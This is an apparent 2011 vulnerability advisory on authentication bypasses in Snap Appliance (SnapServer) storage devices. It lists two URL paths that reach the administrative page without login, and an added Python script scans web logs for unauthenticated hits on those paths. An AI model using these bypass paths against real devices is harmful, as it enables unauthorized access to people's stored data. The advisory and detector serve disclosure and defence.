Multiple Snap Appliance (SnapServer) Bypass Vulnerabilities

2011-02-14T00:00:00
ID SECURITYVULNS:DOC:25696
Type securityvulns
Reporter Securityvulns
Modified 2011-02-14T00:00:00

Description

Exploit Title: Multiple Snap Appliance (SnapServer) Vulnerabilities

Date: 13-02-2011

Author: SeeMe

Vendor Link: http://www.overlandstorage.com/

Affected Version(s): N/A

Multiple Snap Appliance (SnapServer) devices suffer from multiple vulnerabilities that allow unprivileged users to view and modify storage data. These vulnerabilities can be exploited via a web browser.

The following example URLs allow access to the storage's main administrative web page without authentication:

http://127.0.0.1/patch/DataKeeper Backup Of C/Documents and Settings/LocalService/Local Settings/
http://127.0.0.1/common-cgi/shownas
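
For detection, the following added example (not part of the original advisory) scans web access logs for requests to the two paths above that were served without an authenticated user. It assumes a web server or reverse proxy that writes Common Log Format with the authenticated user in the third field; the function names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Paths taken from the advisory's two example URLs (no trailing slash).
SENSITIVE = ("/patch", "/common-cgi/shownas")

# Assumed Common Log Format:
# client ident authuser [time] "METHOD target HTTP/x" status size
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) ')

def normalise(target):
    """Reduce a request target to a canonical path so encoded variants still match."""
    path = unquote(target.split("?", 1)[0])   # drop the query string, decode %xx
    path = re.sub(r"/+", "/", path)           # collapse repeated slashes
    # Resolve ./ and ../ segments; lower-casing is deliberately conservative.
    return posixpath.normpath(path).lower()

def unauthenticated_hits(lines):
    """Return (client, path) for 2xx responses to sensitive paths with no auth user."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        client, user, target, status = m.groups()
        path = normalise(target)
        sensitive = any(path == p or path.startswith(p + "/") for p in SENSITIVE)
        if sensitive and user == "-" and status.startswith("2"):
            hits.append((client, path))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [14/Feb/2011:10:00:01 +0000] "GET /common-cgi/shownas HTTP/1.1" 200 5120',
    '192.0.2.10 - - [14/Feb/2011:10:00:05 +0000] "GET /patch/DataKeeper%20Backup%20Of%20C/ HTTP/1.1" 200 2048',
    '198.51.100.7 - admin [14/Feb/2011:10:01:00 +0000] "GET /common-cgi/shownas HTTP/1.1" 200 5120',
    '192.0.2.33 - - [14/Feb/2011:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 900',
    '192.0.2.44 - - [14/Feb/2011:10:03:00 +0000] "GET /common-cgi/shownas HTTP/1.1" 401 0',
    '203.0.113.5 - - [14/Feb/2011:10:04:00 +0000] "GET //common-cgi/%73hownas HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, path in unauthenticated_hits(SAMPLE):
        print(f"unauthenticated access served: {client} -> {path}")
```

Requests that were authenticated or rejected with a non-2xx status are not reported, so each hit is a page that was actually served without credentials.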